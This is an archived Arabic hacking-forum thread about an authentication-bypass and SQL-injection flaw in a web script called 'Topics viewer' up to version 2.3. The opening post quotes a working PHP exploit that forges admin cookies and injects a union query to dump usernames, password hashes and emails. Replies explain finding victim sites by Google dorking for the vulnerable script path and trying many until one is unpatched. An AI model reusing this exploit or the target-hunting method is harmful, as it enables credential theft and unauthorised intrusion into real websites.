:: vBspiders Professional Network :: - [استفسار] حول ثغرة Topics viewer <= 2.3 Authentication Bypass & SQL Injection

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)

- جـــ'ابات العناكــ'ب (http://www.vbspiders.com/vb/forumdisplay.php?f=343)

- - [استفسار] حول ثغرة Topics viewer <= 2.3 Authentication Bypass & SQL Injection (http://www.vbspiders.com/vb/showthread.php?t=63194)

حول ثغرة Topics viewer <= 2.3 Authentication Bypass & SQL Injection

السلام عليكم ورحمة الله وبركاته

المهم

حصلت ثغره جديده توها نزلت
http://pastebin.com/KqFCfyc3
فهمت تقريبآ 60%

اقتباس:

<?

$host="http://www.el3drabyad.com/"; //ضع الموقع المصاب بدل هذا الموقع واستعرض الملف من المتصفح

$ch = curl_init();

curl_setopt($ch, CURLOPT_URL, $host."/modcp/rmv_topic_pop.php?id=-1+/*!union*/+/*!SELeCT*/+1,group_concat(u_name,0x3a,u_mpass,0x3a,u_email), 3,4,5,6,7,8,9,10,11,12+/*!frOm*/+users--");

curl_setopt($ch, CURLOPT_******, "admin=ahwak2000;mod=ahwak2000;");

curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);

curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);

$buffer = curl_exec($ch);

if(strpos($buffer,"style.css"))
{

echo " [-]---------------------------------------------[-] ";

$reg = '#<li .*>.*:(.*?)؟</li>#Us';

preg_match($reg,$buffer,$ahwak);

$s1=explode(",",$ahwak[1]);
$i=1;

foreach($s1 as $ayrik){

print " [$i] ".trim($ayrik)." ";

$i++;

}

echo " [-]---------------------------------------------[-] z.u5@hotmail.com";

}

?>

طيب هذا الاستغلال تمام،!!
الي مافهمته هل استعرضه بمتداد html>?
+
دوركت لها لاني حآولت بها ماقدرت
+
كيف اعرف هل الموقع مصاب بالثغره ام لا

بنتضآركم

رد: حول ثغرة Topics viewer <= 2.3 Authentication Bypass & SQL Injection

اقتباس:

المشاركة الأصلية كتبت بواسطة Abo MalaK (المشاركة 440895)

السلام عليكم ورحمة الله وبركاته

المهم

حصلت ثغره جديده توها نزلت
http://pastebin.com/KqFCfyc3
فهمت تقريبآ 60%

اكيد اخى العزيز الموقع ينتهى مثل هذا
.php?id=

ثانيا الاسكربت المصاب الذى ستبحث عنه
/modcp/rmv_topic_pop.php?

ويمكنك ان تقوم بعمل التالى
inurl:
ثم تضع بعدها اسم الاسكربت المصاب فى محرك البحث جوجل ثم تبدأ بالاختبار على عدة مواقع
وملحوظة لا تيأس اذا وجدت عديد من المواقع تم ترقيع الثغرة منها واستمر فى المحاولة وتذكر دائما ان الصبر احد الاركان الاساسية للنجاح

رد: حول ثغرة Topics viewer <= 2.3 Authentication Bypass & SQL Injection

شآكر لتفاعلك ،

بس الدوركت مستحيل يكون

/modcp/rmv_topic_pop.php?

لآن ماطلع ولا موقع،

بعدين الاستغلال هل احفظ الثغره بصيغة html واستغل؟

رد: حول ثغرة Topics viewer <= 2.3 Authentication Bypass & SQL Injection

الآستغلال لحد الآن ماوصلت له،

هل اعدل على كود الثغره ام انفذ امر
php rmv_topic_pop.php site.com/path/

؟